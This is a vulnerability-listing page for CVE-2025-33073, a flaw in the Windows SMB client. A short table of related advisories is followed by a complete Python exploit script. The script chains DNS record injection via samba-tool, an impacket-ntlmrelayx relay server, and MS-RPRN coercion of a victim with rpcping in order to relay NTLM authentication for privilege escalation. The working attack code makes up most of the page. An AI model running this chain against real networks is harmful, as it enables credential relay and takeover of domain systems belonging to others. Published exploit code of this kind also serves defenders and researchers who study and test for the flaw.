| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Improper Access Control in Microsoft | 13 Jun 2025 12:15 | – | githubexploit |
| Exploit for Improper Access Control in Microsoft | 10 Dec 2025 03:46 | – | githubexploit |
| July "In the Trend of VM" (#17): vulnerabilities in Microsoft Windows and Roundcube | 21 Jul 2025 16:30 | – | avleonov |
| About Elevation of Privilege – Windows SMB Client (CVE-2025-33073) vulnerability | 13 Jul 2025 12:26 | – | avleonov |
| June Microsoft Patch Tuesday | 10 Jun 2025 21:49 | – | avleonov |
| CVE-2025-33073 | 10 Jun 2025 13:15 | – | circl |
| Microsoft Windows SMB Client Improper Access Control Vulnerability | 20 Oct 2025 00:00 | – | cisa_kev |
| CISA Adds Five Known Exploited Vulnerabilities to Catalog | 20 Oct 2025 12:00 | – | cisa |
| Microsoft Windows SMB Server access control error vulnerability | 10 Jun 2025 00:00 | – | cnnvd |
| CVE-2025-33073 | 10 Jun 2025 17:02 | – | cve |
```python
#!/usr/bin/env python3
# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-13
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
# CVE: CVE-2025-33073
# Type: Remote
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
# User Interaction: Required (authenticated domain user)
# Remediation Level: Official Fix Available
#
# Affected Versions:
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
# - Windows Server 2022 (including 23H2 editions)
# - Windows Server 2019
# - Windows 10 versions from 1507 up to 22H2
# - Windows Server 2016 and 2008 (with appropriate versions)
#
# Description:
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
# Windows Server 2022, and earlier versions vulnerable to this method.
#
# Note: The exploit requires the victim to be an authenticated domain user and the environment
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
#
# DISCLAIMER: For authorized security testing and educational use only.
import argparse
import subprocess
import socket
import time
import sys


def inject_dns_record(dns_ip, zone, record_name, attacker_ip, username, password):
    """Add an A record <record_name>.<zone> -> attacker_ip through the DC's DNS RPC interface.

    samba-tool needs an account with write access to the zone (the PoC assumes
    the domain Administrator), so this step presumes existing privileged access.
    """
    print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
    cmd = [
        "samba-tool", "dns", "add", dns_ip, zone,
        record_name, "A", attacker_ip,
        f"--username={username}", f"--password={password}",
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] DNS record successfully added.")
    except (subprocess.CalledProcessError, FileNotFoundError) as e:
        # FileNotFoundError: samba-tool is not installed on this host
        print(f"[!] Failed to add DNS record ({e}). Check credentials, connectivity and that samba-tool is installed.")
        sys.exit(1)


def check_record(record_name, attempts=10, delay=2):
    """Poll until the injected name resolves.

    Resolution goes through this host's own resolver, so it must be pointed at
    the DC (or another server for the zone) for the check to mean anything.
    """
    print("[*] Verifying DNS record propagation...")
    for _ in range(attempts):
        try:
            _, _, addresses = socket.gethostbyname_ex(record_name)
            if addresses:
                print(f"[+] DNS record resolved to: {addresses}")
                return True
        except socket.gaierror:
            time.sleep(delay)
    print("[!] DNS record did not propagate or resolve.")
    return False


def start_ntlmrelay(target):
    """Launch impacket-ntlmrelayx relaying to `target` and return its process handle.

    The coerced victim authenticates over SMB (its spooler connects to
    \\\\<fake_host>\\pipe\\spoolss), so the SMB listener must stay enabled:
    passing --no-smb-server would discard exactly that connection.
    -smb2support is required because current Windows clients no longer speak SMB1.
    """
    print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
    try:
        proc = subprocess.Popen(["impacket-ntlmrelayx", "-t", target, "-smb2support"])
    except OSError as e:
        print(f"[!] Failed to start NTLM relay server: {e}")
        sys.exit(1)
    print("[*] NTLM relay server started.")
    return proc


def trigger_coercion(victim_ip, fake_host):
    """Ask the victim's spooler (MS-RPRN over \\pipe\\spoolss) to contact fake_host.

    rpcping is a Windows RPC diagnostic utility, so it must be available on the
    host running this script; the arguments are kept as published by the author.
    This is the step that has to produce the victim's outbound SMB authentication.
    """
    print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
    cmd = [
        "rpcping",
        "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
        "-s", fake_host,
        "-e", "1234",
        "-a", "n",
        "-u", "none",
        "-p", "none",
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] Coercion RPC call sent successfully.")
    except (subprocess.CalledProcessError, FileNotFoundError) as e:
        print(f"[!] RPC coercion failed ({e}). Verify victim connectivity, spooler status and that rpcping is present.")
        sys.exit(1)


def main():
    parser = argparse.ArgumentParser(
        description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
    parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
    parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
    parser.add_argument("--dc-fqdn", required=True,
                        help="AD DNS zone (domain FQDN) that the trigger record is added to")
    parser.add_argument("--target", required=True, help="Target system to relay authentication to")
    parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
    parser.add_argument("--dns-user", default="Administrator", help="Account used for the samba-tool DNS update")
    parser.add_argument("--dns-pass", required=True, help="Password for --dns-user")
    args = parser.parse_args()

    record = "relaytrigger"
    fqdn = f"{record}.{args.dc_fqdn}"

    inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip, args.dns_user, args.dns_pass)
    if not check_record(fqdn):
        print("[!] DNS verification failed, aborting.")
        sys.exit(1)

    relay = start_ntlmrelay(args.target)
    time.sleep(5)  # Give the relay listeners time to bind
    if relay.poll() is not None:
        print(f"[!] ntlmrelayx exited early (code {relay.returncode}); is port 445 already in use?")
        sys.exit(1)

    trigger_coercion(args.victim_ip, fqdn)
    print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")
    try:
        relay.wait()  # Keep the relay in the foreground until Ctrl-C
    except KeyboardInterrupt:
        relay.terminate()


if __name__ == "__main__":
    main()
```